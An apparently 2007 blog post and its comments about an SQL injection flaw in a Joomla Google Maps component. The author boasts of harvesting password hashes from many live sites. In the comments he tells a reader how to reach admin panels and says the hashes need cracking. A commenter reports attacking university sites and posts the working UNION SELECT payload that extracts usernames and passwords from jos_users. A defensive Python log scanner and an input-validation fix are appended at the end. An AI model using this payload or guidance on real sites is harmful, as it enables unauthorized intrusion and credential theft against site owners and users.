Joomla

Posted by ghimau under
Hmm.. Aunty virus and I were supposed to meet Dato' K, but he's busy. Ah.. thank God :)

New SQL bug in the Google Maps component? Hihihi
Found a lot of vulnerable sites. Got their password hashes.

Use it at your own risk. This is just a proof of concept of how SQL injection can retrieve valuable and sensitive information.


Hacked by me :)

12 comments:

On 1 August 2007 at 11:44 , viruspadu said...

yahooooooooo...
got to rest a bit today
yabedabeduuuuuuuu

 
On 1 August 2007 at 11:48 , ghimau said...

yes yes yes

 
On 1 August 2007 at 17:19 , jay said...

Hello, I'm from Indonesia. How do I get into the admin?

How do I use the password obtained from the Joomla SQL injection?

Thanks, please send your answer to cagle_shop@yahoo.com

A.S.A.P
Fajar

 
On 1 August 2007 at 23:00 , Marusheena said...

hey, rockandrollarmy's webmaster here, nice job, thanks for the advice!

 
On 2 August 2007 at 07:56 , ghimau said...

jay : to get into the admin, use a URL like this http://www.siteanda.com/administrator

The password obtained is in the form of an MD5 hash. You need to brute force or crack that hash first to get the password

marusheena : sorry for the disclosure. If there's anything, you can just contact me

 
On 2 August 2007 at 16:47 , alycia said...

heyyyy Mr. hakes... I heard you have to work tonight, eh.. remember, tonight is Thursday night.. don't let what happened before happen again, hehe...

~ just me giving a reminder ~

 
On 2 August 2007 at 20:11 , Marusheena said...

no prob.!

 
On 3 August 2007 at 11:09 , ghimau said...

it's okay alycia.. I wasn't alone last night.. aunty virus was there too.. :)

 
On 3 August 2007 at 11:43 , فيصل said...

wow.. I want to try this too.. been on leave for 2 days with fever and flu..

 
On 3 August 2007 at 12:24 , فيصل said...

oh.. I just tried it on websites within UTM.. some of them are vulnerable too..
but it seems quite hard to crack the password.. it takes quite a long time

index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
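
A defender's view of the request quoted in the comment above, as an added example that is not part of the original post or its comments: a Python check over web access logs that flags `com_gmaps` requests whose `mapId` is not a plain number. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IPs, hypothetical site).
SAMPLE_LOG = """\
192.0.2.10 - - [03/Aug/2007:12:20:01 +0800] "GET /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=3 HTTP/1.1" 200 5120
192.0.2.77 - - [03/Aug/2007:12:24:13 +0800] "GET /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* HTTP/1.1" 200 6034
192.0.2.77 - - [03/Aug/2007:12:25:40 +0800] "GET /index.php?option=com_gmaps&task=viewmap&mapId=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0 HTTP/1.1" 200 811
192.0.2.15 - - [03/Aug/2007:12:30:02 +0800] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 9001
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/|/\*|--|#")
SQL_WORDS_RE = re.compile(r"\b(union|select|from|jos_users)\b", re.I)

def classify_map_id(raw):
    """Return None for a plain numeric id, else a reason string."""
    if re.fullmatch(r"\d+", raw):
        return None
    # Inline comments stand in for whitespace, so replace them with spaces.
    normalized = SQL_COMMENT_RE.sub(" ", raw)
    words = sorted({w.lower() for w in SQL_WORDS_RE.findall(normalized)})
    if words:
        return "sql keywords: " + ",".join(words)
    return "non-numeric mapId"

def scan(log_text):
    """Return (client_ip, status, reason) for suspicious com_gmaps requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # parse_qs percent-decodes values, so encoded payloads are caught too.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if params.get("option", [""])[0].lower() != "com_gmaps":
            continue
        for raw in params.get("mapId", []):
            reason = classify_map_id(raw)
            if reason:
                findings.append((ip, int(status), reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response to a flagged request is worth a closer look than a 4xx or 5xx one. The same rule applied in the application, accepting only an integer for `mapId` before it reaches the query, closes the hole the log check detects.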

 
On 6 August 2007 at 09:54 , ghimau said...

cool :)

 
On 7 August 2007 at 10:15 , yan said...

UN observer